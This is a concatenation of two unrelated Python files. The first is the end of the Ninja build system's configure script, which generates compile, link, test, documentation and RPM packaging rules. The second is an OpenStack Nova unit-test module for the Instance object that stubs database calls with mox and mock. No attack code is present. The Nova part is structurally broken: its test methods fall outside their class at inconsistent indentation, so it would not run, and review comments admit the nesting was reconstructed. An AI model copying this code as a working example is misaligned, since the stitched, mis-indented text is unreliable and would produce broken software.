    if platform in ('windows', 'mingw'):
        return arg
    if '"' in arg:
        return "'%s'" % arg.replace("'", "\\'")
    return arg
# Fold environment-supplied flags in, then emit the flag variables
# (shell-escaped so NINJA_PYTHON's quotes survive).
if 'CFLAGS' in configure_env:
    cflags.append(configure_env['CFLAGS'])
n.variable('cflags', ' '.join(shell_escape(flag) for flag in cflags))
if 'LDFLAGS' in configure_env:
    ldflags.append(configure_env['LDFLAGS'])
n.variable('ldflags', ' '.join(shell_escape(flag) for flag in ldflags))
n.newline()

# Compile rule: MSVC gets header deps from /showIncludes (optionally
# via the msvc helper binary); everyone else uses gcc-style -MMD depfiles.
if platform == 'windows':
    compiler = '$cxx'
    if options.with_msvc_helper:
        compiler = '%s -o $out -- $cxx /showIncludes' % options.with_msvc_helper
    n.rule('cxx',
           command='%s $cflags -c $in /Fo$out' % compiler,
           depfile='$out.d',
           description='CXX $out')
else:
    n.rule('cxx',
           command='$cxx -MMD -MT $out -MF $out.d $cflags -c $in -o $out',
           depfile='$out.d',
           description='CXX $out')
n.newline()

# Static-library rule, chosen by the *host* toolchain.
if host == 'windows':
    n.rule('ar',
           command='lib /nologo /ltcg /out:$out $in',
           description='LIB $out')
elif host == 'mingw':
    n.rule('ar',
           command='cmd /c $ar cqs $out.tmp $in && move /Y $out.tmp $out',
           description='AR $out')
else:
    n.rule('ar',
           command='rm -f $out && $ar crs $out $in',
           description='AR $out')
n.newline()

# Link rule, per target platform.
if platform == 'windows':
    n.rule('link',
           command='$cxx $in $libs /nologo /link $ldflags /out:$out',
           description='LINK $out')
else:
    n.rule('link',
           command='$cxx $ldflags -o $out $in $libs',
           description='LINK $out')
n.newline()

objs = []

# The dependency browser is POSIX-only (needs inline.sh and python).
if platform not in ('mingw', 'windows'):
    n.comment('browse_py.h is used to inline browse.py.')
    n.rule('inline',
           command='src/inline.sh $varname < $in > $out',
           description='INLINE $out')
    n.build(built('browse_py.h'), 'inline', src('browse.py'),
            implicit='src/inline.sh',
            variables=[('varname', 'kBrowsePy')])
    n.newline()
    objs += cxx('browse', order_only=built('browse_py.h'))
    n.newline()
n.comment('the depfile parser and ninja lexers are generated using re2c.')
def has_re2c():
    """Return True when an `re2c` binary can be executed on PATH."""
    import subprocess
    try:
        # Discard re2c's version banner; we only care whether exec works.
        subprocess.call(['re2c', '-v'], stdout=subprocess.PIPE)
    except OSError:
        return False
    return True
# Regenerate the checked-in lexer/parser sources when re2c is available;
# otherwise warn that edits to the .in.cc templates won't take effect.
if has_re2c():
    n.rule('re2c',
           command='re2c -b -i --no-generation-date -o $out $in',
           description='RE2C $out')
    # Generate the .cc files in the source directory so we can check them in.
    n.build(src('depfile_parser.cc'), 're2c', src('depfile_parser.in.cc'))
    n.build(src('lexer.cc'), 're2c', src('lexer.in.cc'))
else:
    print ("warning: re2c not found; changes to src/*.in.cc will not affect "
           "your build.")
n.newline()
n.comment('Core source files all build into ninja library.')
for name in ['build',
             'build_log',
             'clean',
             'depfile_parser',
             'disk_interface',
             'edit_distance',
             'eval_env',
             'explain',
             'graph',
             'graphviz',
             'lexer',
             'manifest_parser',
             'metrics',
             'state',
             'util']:
    objs += cxx(name)
# Platform-specific subprocess implementation plus Windows-only helpers.
if platform in ('mingw', 'windows'):
    objs += cxx('subprocess-win32')
    if platform == 'windows':
        objs += cxx('includes_normalize-win32')
        objs += cxx('msvc_helper-win32')
        objs += cxx('minidump-win32')
    # NOTE(review): nesting reconstructed -- getopt appears to be built
    # for both mingw and MSVC here; confirm against upstream configure.py.
    objs += cc('getopt')
else:
    objs += cxx('subprocess-posix')
if platform == 'windows':
    ninja_lib = n.build(built('ninja.lib'), 'ar', objs)
else:
    ninja_lib = n.build(built('libninja.a'), 'ar', objs)
n.newline()

# Everything below links against the library just archived.
if platform == 'windows':
    libs.append('ninja.lib')
else:
    libs.append('-lninja')
all_targets = []

n.comment('Main executable is library plus main() function.')
objs = cxx('ninja')
ninja = n.build(binary('ninja'), 'link', objs, implicit=ninja_lib,
                variables=[('libs', libs)])
n.newline()
all_targets += ninja

if platform == 'windows':
    n.comment('Helper for working with MSVC.')
    msvc_helper = n.build(binary('ninja-msvc-helper'), 'link',
                          cxx('msvc_helper_main-win32'),
                          implicit=ninja_lib,
                          variables=[('libs', libs)])
    n.default(msvc_helper)
    n.newline()
    all_targets += msvc_helper

n.comment('Tests all build into ninja_test executable.')
variables = []
test_cflags = None
test_ldflags = None
# NOTE(review): this aliases `libs`, so the extend() calls below mutate
# the shared list too; harmless because the earlier targets were already
# written out, but worth confirming it's intentional.
test_libs = libs
objs = []
if options.with_gtest:
    path = options.with_gtest
    gtest_all_incs = '-I%s -I%s' % (path, os.path.join(path, 'include'))
    if platform == 'windows':
        gtest_cflags = '/nologo /EHsc ' + gtest_all_incs
    else:
        gtest_cflags = '-fvisibility=hidden ' + gtest_all_incs
    objs += n.build(built('gtest-all' + objext), 'cxx',
                    os.path.join(path, 'src', 'gtest-all.cc'),
                    variables=[('cflags', gtest_cflags)])
    objs += n.build(built('gtest_main' + objext), 'cxx',
                    os.path.join(path, 'src', 'gtest_main.cc'),
                    variables=[('cflags', gtest_cflags)])
    test_cflags = cflags + ['-DGTEST_HAS_RTTI=0',
                            '-I%s' % os.path.join(path, 'include')]
elif platform == 'windows':
    test_libs.extend(['gtest_main.lib', 'gtest.lib'])
else:
    test_libs.extend(['-lgtest_main', '-lgtest'])
# Test sources, compiled with the (possibly gtest-augmented) flags.
for name in ['build_log_test',
             'build_test',
             'clean_test',
             'depfile_parser_test',
             'disk_interface_test',
             'edit_distance_test',
             'graph_test',
             'lexer_test',
             'manifest_parser_test',
             'state_test',
             'subprocess_test',
             'test',
             'util_test']:
    objs += cxx(name, variables=[('cflags', test_cflags)])
if platform == 'windows':
    for name in ['includes_normalize_test', 'msvc_helper_test']:
        objs += cxx(name, variables=[('cflags', test_cflags)])

if platform != 'mingw' and platform != 'windows':
    test_libs.append('-lpthread')
ninja_test = n.build(binary('ninja_test'), 'link', objs, implicit=ninja_lib,
                     variables=[('ldflags', test_ldflags),
                                ('libs', test_libs)])
n.newline()
all_targets += ninja_test

n.comment('Ancilliary executables.')
objs = cxx('parser_perftest')
all_targets += n.build(binary('parser_perftest'), 'link', objs,
                       implicit=ninja_lib, variables=[('libs', libs)])
objs = cxx('build_log_perftest')
all_targets += n.build(binary('build_log_perftest'), 'link', objs,
                       implicit=ninja_lib, variables=[('libs', libs)])
objs = cxx('canon_perftest')
all_targets += n.build(binary('canon_perftest'), 'link', objs,
                       implicit=ninja_lib, variables=[('libs', libs)])
objs = cxx('hash_collision_bench')
all_targets += n.build(binary('hash_collision_bench'), 'link', objs,
                       implicit=ninja_lib, variables=[('libs', libs)])
n.newline()
n.comment('Generate a graph using the "graph" tool.')
n.rule('gendot',
       command='./ninja -t graph > $out')
n.rule('gengraph',
       command='dot -Tpng $in > $out')
dot = n.build(built('graph.dot'), 'gendot', ['ninja', 'build.ninja'])
n.build('graph.png', 'gengraph', dot)
n.newline()

n.comment('Generate the manual using asciidoc.')
n.rule('asciidoc',
       command='asciidoc -a toc -a max-width=45em -o $out $in',
       description='ASCIIDOC $in')
manual = n.build(doc('manual.html'), 'asciidoc', doc('manual.asciidoc'))
n.build('manual', 'phony',
        order_only=manual)
n.newline()

n.comment('Generate Doxygen.')
n.rule('doxygen',
       command='doxygen $in',
       description='DOXYGEN $in')
n.variable('doxygen_mainpage_generator',
           src('gen_doxygen_mainpage.sh'))
n.rule('doxygen_mainpage',
       command='$doxygen_mainpage_generator $in > $out',
       description='DOXYGEN_MAINPAGE $out')
mainpage = n.build(built('doxygen_mainpage'), 'doxygen_mainpage',
                   ['README', 'COPYING'],
                   implicit=['$doxygen_mainpage_generator'])
n.build('doxygen', 'doxygen', doc('doxygen.config'),
        implicit=mainpage)
n.newline()

# Self-regeneration rule (skipped on mingw hosts).
if host != 'mingw':
    n.comment('Regenerate build files if build script changes.')
    n.rule('configure',
           command='${configure_env}%s configure.py $configure_args' %
               options.with_python,
           generator=True)
    n.build('build.ninja', 'configure',
            implicit=['configure.py', os.path.normpath('misc/ninja_syntax.py')])
    n.newline()

# A bare `ninja` invocation builds just the main binary.
n.default(ninja)
n.newline()

if host == 'linux':
    n.comment('Packaging')
    n.rule('rpmbuild',
           command="rpmbuild \
--define 'ver git' \
--define \"rel `git rev-parse --short HEAD`\" \
--define '_topdir %(pwd)/rpm-build' \
--define '_builddir %{_topdir}' \
--define '_rpmdir %{_topdir}' \
--define '_srcrpmdir %{_topdir}' \
--define '_rpmfilename %%{NAME}-%%{VERSION}-%%{RELEASE}.%%{ARCH}.rpm' \
--define '_specdir %{_topdir}' \
--define '_sourcedir %{_topdir}' \
--quiet \
-bb misc/packaging/ninja.spec",
           description='Building RPM..')
    n.build('rpm', 'rpmbuild',
            implicit=['ninja','README', 'COPYING', doc('manual.html')])
    n.newline()

n.build('all', 'phony', all_targets)

print 'wrote %s.' % BUILD_FILENAME
| |
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import iso8601
import mock
import mox
import netaddr
from nova.cells import rpcapi as cells_rpcapi
from nova.compute import flavors
from nova import db
from nova import exception
from nova.network import model as network_model
from nova import notifications
from nova.objects import instance
from nova.objects import instance_info_cache
from nova.objects import instance_numa_topology
from nova.objects import pci_device
from nova.objects import security_group
from nova.openstack.common import timeutils
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import fake_instance
from nova.tests.objects import test_instance_fault
from nova.tests.objects import test_instance_info_cache
from nova.tests.objects import test_instance_numa_topology
from nova.tests.objects import test_objects
from nova.tests.objects import test_security_group
from nova import utils
class _TestInstanceObject(object):
@property
def fake_instance(self):
    """A fresh fake DB instance dict, normalized for object comparison:
    timestamps cleared, launched_at made tz-aware with no microseconds
    (to match isotime round-trips), and ids bound to self.context."""
    fake_instance = fakes.stub_instance(id=2,
                                        access_ipv4='1.2.3.4',
                                        access_ipv6='::1')
    fake_instance['cell_name'] = 'api!child'
    fake_instance['scheduled_at'] = None
    fake_instance['terminated_at'] = None
    fake_instance['deleted_at'] = None
    fake_instance['created_at'] = None
    fake_instance['updated_at'] = None
    # isotime serialization drops microseconds and forces UTC
    fake_instance['launched_at'] = (
        fake_instance['launched_at'].replace(
            tzinfo=iso8601.iso8601.Utc(), microsecond=0))
    fake_instance['deleted'] = False
    fake_instance['info_cache']['instance_uuid'] = fake_instance['uuid']
    fake_instance['security_groups'] = []
    fake_instance['pci_devices'] = []
    fake_instance['user_id'] = self.context.user_id
    fake_instance['project_id'] = self.context.project_id
    return fake_instance
def test_datetime_deserialization(self):
    """A datetime field round-trips through the primitive form as an
    ISO 8601 string and comes back as a real datetime."""
    red_letter_date = timeutils.parse_isotime(
        timeutils.isotime(datetime.datetime(1955, 11, 5)))
    inst = instance.Instance(uuid='fake-uuid', launched_at=red_letter_date)
    primitive = inst.obj_to_primitive()
    expected = {'nova_object.name': 'Instance',
                'nova_object.namespace': 'nova',
                'nova_object.version': '1.15',
                'nova_object.data':
                    {'uuid': 'fake-uuid',
                     'launched_at': '1955-11-05T00:00:00Z'},
                'nova_object.changes': ['launched_at', 'uuid']}
    self.assertEqual(primitive, expected)
    inst2 = instance.Instance.obj_from_primitive(primitive)
    self.assertIsInstance(inst2.launched_at, datetime.datetime)
    self.assertEqual(inst2.launched_at, red_letter_date)
def test_ip_deserialization(self):
    """IP address fields serialize to strings in the primitive and
    deserialize back to netaddr.IPAddress objects."""
    inst = instance.Instance(uuid='fake-uuid', access_ip_v4='1.2.3.4',
                             access_ip_v6='::1')
    primitive = inst.obj_to_primitive()
    expected = {'nova_object.name': 'Instance',
                'nova_object.namespace': 'nova',
                'nova_object.version': '1.15',
                'nova_object.data':
                    {'uuid': 'fake-uuid',
                     'access_ip_v4': '1.2.3.4',
                     'access_ip_v6': '::1'},
                'nova_object.changes': ['uuid', 'access_ip_v6',
                                        'access_ip_v4']}
    self.assertEqual(primitive, expected)
    inst2 = instance.Instance.obj_from_primitive(primitive)
    self.assertIsInstance(inst2.access_ip_v4, netaddr.IPAddress)
    self.assertIsInstance(inst2.access_ip_v6, netaddr.IPAddress)
    self.assertEqual(inst2.access_ip_v4, netaddr.IPAddress('1.2.3.4'))
    self.assertEqual(inst2.access_ip_v6, netaddr.IPAddress('::1'))
def test_get_without_expected(self):
    """get_by_uuid with expected_attrs=[] joins no extra columns and
    leaves every optional attribute unset."""
    self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
    db.instance_get_by_uuid(self.context, 'uuid',
                            columns_to_join=[],
                            use_slave=False
                            ).AndReturn(self.fake_instance)
    self.mox.ReplayAll()
    inst = instance.Instance.get_by_uuid(self.context, 'uuid',
                                         expected_attrs=[])
    for attr in instance.INSTANCE_OPTIONAL_ATTRS:
        self.assertFalse(inst.obj_attr_is_set(attr))
    self.assertRemotes()
def test_get_with_expected(self):
    """get_by_uuid with all optional attrs joins the joinable columns
    and fetches fault/numa topology through their own DB calls."""
    self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
    self.mox.StubOutWithMock(db, 'instance_fault_get_by_instance_uuids')
    self.mox.StubOutWithMock(
        db, 'instance_extra_get_by_instance_uuid')
    # fault and numa_topology are not plain columns_to_join entries
    exp_cols = instance.INSTANCE_OPTIONAL_ATTRS[:]
    exp_cols.remove('fault')
    exp_cols.remove('numa_topology')
    db.instance_get_by_uuid(
        self.context, 'uuid',
        columns_to_join=exp_cols,
        use_slave=False
        ).AndReturn(self.fake_instance)
    fake_faults = test_instance_fault.fake_faults
    db.instance_fault_get_by_instance_uuids(
        self.context, [self.fake_instance['uuid']]
        ).AndReturn(fake_faults)
    fake_topology = test_instance_numa_topology.fake_db_topology
    db.instance_extra_get_by_instance_uuid(
        self.context, self.fake_instance['uuid']
        ).AndReturn(fake_topology)
    self.mox.ReplayAll()
    inst = instance.Instance.get_by_uuid(
        self.context, 'uuid',
        expected_attrs=instance.INSTANCE_OPTIONAL_ATTRS)
    for attr in instance.INSTANCE_OPTIONAL_ATTRS:
        self.assertTrue(inst.obj_attr_is_set(attr))
    self.assertRemotes()
def test_get_by_id(self):
    """get_by_id joins the default columns and returns the matching
    instance."""
    self.mox.StubOutWithMock(db, 'instance_get')
    db.instance_get(self.context, 'instid',
                    columns_to_join=['info_cache',
                                     'security_groups']
                    ).AndReturn(self.fake_instance)
    self.mox.ReplayAll()
    inst = instance.Instance.get_by_id(self.context, 'instid')
    self.assertEqual(inst.uuid, self.fake_instance['uuid'])
    self.assertRemotes()
def test_load(self):
    """Touching an unset attribute lazy-loads it from the DB exactly
    once; a second access hits the cached value."""
    self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
    fake_uuid = self.fake_instance['uuid']
    db.instance_get_by_uuid(self.context, fake_uuid,
                            columns_to_join=['info_cache',
                                             'security_groups'],
                            use_slave=False
                            ).AndReturn(self.fake_instance)
    fake_inst2 = dict(self.fake_instance,
                      system_metadata=[{'key': 'foo', 'value': 'bar'}])
    # Second DB hit only fetches the missing system_metadata column.
    db.instance_get_by_uuid(self.context, fake_uuid,
                            columns_to_join=['system_metadata'],
                            use_slave=False
                            ).AndReturn(fake_inst2)
    self.mox.ReplayAll()
    inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
    self.assertFalse(hasattr(inst, '_system_metadata'))
    sys_meta = inst.system_metadata
    self.assertEqual(sys_meta, {'foo': 'bar'})
    self.assertTrue(hasattr(inst, '_system_metadata'))
    # Make sure we don't run load again
    sys_meta2 = inst.system_metadata
    self.assertEqual(sys_meta2, {'foo': 'bar'})
    self.assertRemotes()
def test_load_invalid(self):
    """Lazy-loading an unknown attribute raises ObjectActionError."""
    inst = instance.Instance(context=self.context, uuid='fake-uuid')
    self.assertRaises(exception.ObjectActionError,
                      inst.obj_load_attr, 'foo')
def test_get_remote(self):
    """Fields fetched via get_by_uuid preserve their DB values."""
    # isotime doesn't have microseconds and is always UTC
    self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
    fake_instance = self.fake_instance
    db.instance_get_by_uuid(self.context, 'fake-uuid',
                            columns_to_join=['info_cache',
                                             'security_groups'],
                            use_slave=False
                            ).AndReturn(fake_instance)
    self.mox.ReplayAll()
    inst = instance.Instance.get_by_uuid(self.context, 'fake-uuid')
    self.assertEqual(inst.id, fake_instance['id'])
    self.assertEqual(inst.launched_at, fake_instance['launched_at'])
    self.assertEqual(str(inst.access_ip_v4),
                     fake_instance['access_ip_v4'])
    self.assertEqual(str(inst.access_ip_v6),
                     fake_instance['access_ip_v6'])
    self.assertRemotes()
def test_refresh(self):
    """refresh() re-fetches the row, updates changed fields, refreshes
    the info cache, and leaves the object with no pending changes."""
    self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
    fake_uuid = self.fake_instance['uuid']
    # First fetch returns the original host, second the updated one.
    db.instance_get_by_uuid(self.context, fake_uuid,
                            columns_to_join=['info_cache',
                                             'security_groups'],
                            use_slave=False
                            ).AndReturn(dict(self.fake_instance,
                                             host='orig-host'))
    db.instance_get_by_uuid(self.context, fake_uuid,
                            columns_to_join=['info_cache',
                                             'security_groups'],
                            use_slave=False
                            ).AndReturn(dict(self.fake_instance,
                                             host='new-host'))
    self.mox.StubOutWithMock(instance_info_cache.InstanceInfoCache,
                             'refresh')
    instance_info_cache.InstanceInfoCache.refresh()
    self.mox.ReplayAll()
    inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
    self.assertEqual(inst.host, 'orig-host')
    inst.refresh()
    self.assertEqual(inst.host, 'new-host')
    self.assertRemotes()
    self.assertEqual(set([]), inst.obj_what_changed())
def test_refresh_does_not_recurse(self):
    """refresh() must not recurse when the re-fetched copy has no
    context; it surfaces OrphanedObjectError instead."""
    inst = instance.Instance(context=self.context, uuid='fake-uuid',
                             metadata={})
    inst_copy = instance.Instance()
    inst_copy.uuid = inst.uuid
    self.mox.StubOutWithMock(instance.Instance, 'get_by_uuid')
    instance.Instance.get_by_uuid(self.context, uuid=inst.uuid,
                                  expected_attrs=['metadata'],
                                  use_slave=False
                                  ).AndReturn(inst_copy)
    self.mox.ReplayAll()
    self.assertRaises(exception.OrphanedObjectError, inst.refresh)
def _save_test_helper(self, cell_type, save_kwargs):
    """Common code for testing save() for cells/non-cells.

    cell_type is None, 'api' or 'compute'; save_kwargs may carry
    expected_vm_state/expected_task_state/admin_state_reset plus an
    'instance_version' override to exercise older object versions.
    Verifies the DB update payload and the cells/notification fan-out.
    """
    if cell_type:
        self.flags(enable=True, cell_type=cell_type, group='cells')
    else:
        self.flags(enable=False, group='cells')
    old_ref = dict(self.fake_instance, host='oldhost', user_data='old',
                   vm_state='old', task_state='old')
    fake_uuid = old_ref['uuid']
    expected_updates = dict(vm_state='meow', task_state='wuff',
                            user_data='new')
    new_ref = dict(old_ref, host='newhost', **expected_updates)
    exp_vm_state = save_kwargs.get('expected_vm_state')
    exp_task_state = save_kwargs.get('expected_task_state')
    admin_reset = save_kwargs.get('admin_state_reset', False)
    if exp_vm_state:
        expected_updates['expected_vm_state'] = exp_vm_state
    if exp_task_state:
        # Version 1.9 objects expand image_snapshot to include the
        # pending sub-state for backward compatibility.
        if (exp_task_state == 'image_snapshot' and
                'instance_version' in save_kwargs and
                save_kwargs['instance_version'] == '1.9'):
            expected_updates['expected_task_state'] = [
                'image_snapshot', 'image_snapshot_pending']
        else:
            expected_updates['expected_task_state'] = exp_task_state
    self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
    self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
    self.mox.StubOutWithMock(db, 'instance_info_cache_update')
    cells_api_mock = self.mox.CreateMock(cells_rpcapi.CellsAPI)
    self.mox.StubOutWithMock(cells_api_mock,
                             'instance_update_at_top')
    self.mox.StubOutWithMock(cells_api_mock,
                             'instance_update_from_api')
    self.mox.StubOutWithMock(cells_rpcapi, 'CellsAPI',
                             use_mock_anything=True)
    self.mox.StubOutWithMock(notifications, 'send_update')
    db.instance_get_by_uuid(self.context, fake_uuid,
                            columns_to_join=['info_cache',
                                             'security_groups'],
                            use_slave=False
                            ).AndReturn(old_ref)
    db.instance_update_and_get_original(
        self.context, fake_uuid, expected_updates,
        update_cells=False,
        columns_to_join=['info_cache', 'security_groups',
                         'system_metadata']
        ).AndReturn((old_ref, new_ref))
    # api cells push updates down; compute cells push them up.
    if cell_type == 'api':
        cells_rpcapi.CellsAPI().AndReturn(cells_api_mock)
        cells_api_mock.instance_update_from_api(
            self.context, mox.IsA(instance.Instance),
            exp_vm_state, exp_task_state, admin_reset)
    elif cell_type == 'compute':
        cells_rpcapi.CellsAPI().AndReturn(cells_api_mock)
        cells_api_mock.instance_update_at_top(self.context, new_ref)
    notifications.send_update(self.context, mox.IgnoreArg(),
                              mox.IgnoreArg())
    self.mox.ReplayAll()
    inst = instance.Instance.get_by_uuid(self.context, old_ref['uuid'])
    if 'instance_version' in save_kwargs:
        inst.VERSION = save_kwargs.pop('instance_version')
    self.assertEqual('old', inst.task_state)
    self.assertEqual('old', inst.vm_state)
    self.assertEqual('old', inst.user_data)
    inst.vm_state = 'meow'
    inst.task_state = 'wuff'
    inst.user_data = 'new'
    inst.save(**save_kwargs)
    self.assertEqual('newhost', inst.host)
    self.assertEqual('meow', inst.vm_state)
    self.assertEqual('wuff', inst.task_state)
    self.assertEqual('new', inst.user_data)
    self.assertEqual(set([]), inst.obj_what_changed())
# Thin wrappers driving _save_test_helper through each cell-type and
# expected-state combination.
def test_save(self):
    """save() with cells disabled."""
    self._save_test_helper(None, {})

def test_save_in_api_cell(self):
    """save() in an api cell pushes the update down via cells RPC."""
    self._save_test_helper('api', {})

def test_save_in_compute_cell(self):
    """save() in a compute cell pushes the update to the top."""
    self._save_test_helper('compute', {})

def test_save_exp_vm_state(self):
    """save() forwards expected_vm_state to the DB update."""
    self._save_test_helper(None, {'expected_vm_state': ['meow']})

def test_save_exp_task_state(self):
    """save() forwards expected_task_state to the DB update."""
    self._save_test_helper(None, {'expected_task_state': ['meow']})

def test_save_exp_task_state_havana(self):
    """v1.9 objects expand image_snapshot for Havana compatibility."""
    self._save_test_helper(None, {
        'expected_task_state': 'image_snapshot',
        'instance_version': '1.9'})

def test_save_exp_vm_state_api_cell(self):
    self._save_test_helper('api', {'expected_vm_state': ['meow']})

def test_save_exp_task_state_api_cell(self):
    self._save_test_helper('api', {'expected_task_state': ['meow']})

def test_save_exp_task_state_api_cell_admin_reset(self):
    self._save_test_helper('api', {'admin_state_reset': True})
def test_save_rename_sends_notification(self):
    """Changing only display_name still triggers an update
    notification."""
    # Tests that simply changing the 'display_name' on the instance
    # will send a notification.
    self.flags(enable=False, group='cells')
    old_ref = dict(self.fake_instance, display_name='hello')
    fake_uuid = old_ref['uuid']
    expected_updates = dict(display_name='goodbye')
    new_ref = dict(old_ref, **expected_updates)
    self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
    self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
    self.mox.StubOutWithMock(notifications, 'send_update')
    db.instance_get_by_uuid(self.context, fake_uuid,
                            columns_to_join=['info_cache',
                                             'security_groups'],
                            use_slave=False
                            ).AndReturn(old_ref)
    db.instance_update_and_get_original(
        self.context, fake_uuid, expected_updates, update_cells=False,
        columns_to_join=['info_cache', 'security_groups',
                         'system_metadata']
        ).AndReturn((old_ref, new_ref))
    notifications.send_update(self.context, mox.IgnoreArg(),
                              mox.IgnoreArg())
    self.mox.ReplayAll()
    inst = instance.Instance.get_by_uuid(self.context, old_ref['uuid'],
                                         use_slave=False)
    self.assertEqual('hello', inst.display_name)
    inst.display_name = 'goodbye'
    inst.save()
    self.assertEqual('goodbye', inst.display_name)
    self.assertEqual(set([]), inst.obj_what_changed())
@mock.patch('nova.db.instance_update_and_get_original')
@mock.patch('nova.objects.Instance._from_db_object')
def test_save_does_not_refresh_pci_devices(self, mock_fdo, mock_update):
    """save() must not reload pci_devices from the DB result."""
    # NOTE(danms): This tests that we don't update the pci_devices
    # field from the contents of the database. This is not because we
    # don't necessarily want to, but because the way pci_devices is
    # currently implemented it causes versioning issues. When that is
    # resolved, this test should go away.
    mock_update.return_value = None, None
    inst = instance.Instance(context=self.context, id=123)
    inst.uuid = 'foo'
    inst.pci_devices = pci_device.PciDeviceList()
    inst.save()
    self.assertNotIn('pci_devices',
                     mock_fdo.call_args_list[0][1]['expected_attrs'])
def test_get_deleted(self):
    """A nonzero DB 'deleted' value coerces to boolean True."""
    fake_inst = dict(self.fake_instance, id=123, deleted=123)
    fake_uuid = fake_inst['uuid']
    self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
    db.instance_get_by_uuid(self.context, fake_uuid,
                            columns_to_join=['info_cache',
                                             'security_groups'],
                            use_slave=False
                            ).AndReturn(fake_inst)
    self.mox.ReplayAll()
    inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
    # NOTE(danms): Make sure it's actually a bool
    self.assertEqual(inst.deleted, True)
    def test_get_not_cleaned(self):
        # A NULL 'cleaned' column must surface as the boolean False.
        fake_inst = dict(self.fake_instance, id=123, cleaned=None)
        fake_uuid = fake_inst['uuid']
        self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
        db.instance_get_by_uuid(self.context, fake_uuid,
                                columns_to_join=['info_cache',
                                                 'security_groups'],
                                use_slave=False
                                ).AndReturn(fake_inst)
        self.mox.ReplayAll()
        inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
        # NOTE(mikal): Make sure it's actually a bool
        self.assertEqual(inst.cleaned, False)
    def test_get_cleaned(self):
        # A truthy integer 'cleaned' column must surface as True.
        fake_inst = dict(self.fake_instance, id=123, cleaned=1)
        fake_uuid = fake_inst['uuid']
        self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
        db.instance_get_by_uuid(self.context, fake_uuid,
                                columns_to_join=['info_cache',
                                                 'security_groups'],
                                use_slave=False
                                ).AndReturn(fake_inst)
        self.mox.ReplayAll()
        inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
        # NOTE(mikal): Make sure it's actually a bool
        self.assertEqual(inst.cleaned, True)
    def test_with_info_cache(self):
        # Saving after mutating the nested info_cache must issue exactly
        # one instance_info_cache_update with the new network_info JSON.
        fake_inst = dict(self.fake_instance)
        fake_uuid = fake_inst['uuid']
        nwinfo1 = network_model.NetworkInfo.hydrate([{'address': 'foo'}])
        nwinfo2 = network_model.NetworkInfo.hydrate([{'address': 'bar'}])
        nwinfo1_json = nwinfo1.json()
        nwinfo2_json = nwinfo2.json()
        fake_inst['info_cache'] = dict(
            test_instance_info_cache.fake_info_cache,
            network_info=nwinfo1_json,
            instance_uuid=fake_uuid)
        self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
        self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
        self.mox.StubOutWithMock(db, 'instance_info_cache_update')
        # mox expectations below are verified in recording order.
        db.instance_get_by_uuid(self.context, fake_uuid,
                                columns_to_join=['info_cache',
                                                 'security_groups'],
                                use_slave=False
                                ).AndReturn(fake_inst)
        db.instance_info_cache_update(self.context, fake_uuid,
                                      {'network_info': nwinfo2_json})
        self.mox.ReplayAll()
        inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
        self.assertEqual(inst.info_cache.network_info, nwinfo1)
        self.assertEqual(inst.info_cache.instance_uuid, fake_uuid)
        inst.info_cache.network_info = nwinfo2
        inst.save()
    def test_with_info_cache_none(self):
        # A NULL info_cache row must hydrate to None on the object.
        fake_inst = dict(self.fake_instance, info_cache=None)
        fake_uuid = fake_inst['uuid']
        self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
        db.instance_get_by_uuid(self.context, fake_uuid,
                                columns_to_join=['info_cache'],
                                use_slave=False
                                ).AndReturn(fake_inst)
        self.mox.ReplayAll()
        inst = instance.Instance.get_by_uuid(self.context, fake_uuid,
                                             ['info_cache'])
        self.assertIsNone(inst.info_cache)
    def test_with_security_groups(self):
        # Security groups hydrate into SecurityGroup objects, and saving
        # a changed group only updates that one group row.
        fake_inst = dict(self.fake_instance)
        fake_uuid = fake_inst['uuid']
        fake_inst['security_groups'] = [
            {'id': 1, 'name': 'secgroup1', 'description': 'fake-desc',
             'user_id': 'fake-user', 'project_id': 'fake_project',
             'created_at': None, 'updated_at': None, 'deleted_at': None,
             'deleted': False},
            {'id': 2, 'name': 'secgroup2', 'description': 'fake-desc',
             'user_id': 'fake-user', 'project_id': 'fake_project',
             'created_at': None, 'updated_at': None, 'deleted_at': None,
             'deleted': False},
            ]
        self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
        self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
        self.mox.StubOutWithMock(db, 'security_group_update')
        db.instance_get_by_uuid(self.context, fake_uuid,
                                columns_to_join=['info_cache',
                                                 'security_groups'],
                                use_slave=False
                                ).AndReturn(fake_inst)
        # Only group id=1 is expected to be updated below.
        db.security_group_update(self.context, 1, {'description': 'changed'}
                                 ).AndReturn(fake_inst['security_groups'][0])
        self.mox.ReplayAll()
        inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
        self.assertEqual(len(inst.security_groups), 2)
        for index, group in enumerate(fake_inst['security_groups']):
            for key in group:
                self.assertEqual(group[key],
                                 inst.security_groups[index][key])
                self.assertIsInstance(inst.security_groups[index],
                                      security_group.SecurityGroup)
        self.assertEqual(inst.security_groups.obj_what_changed(), set())
        inst.security_groups[0].description = 'changed'
        inst.save()
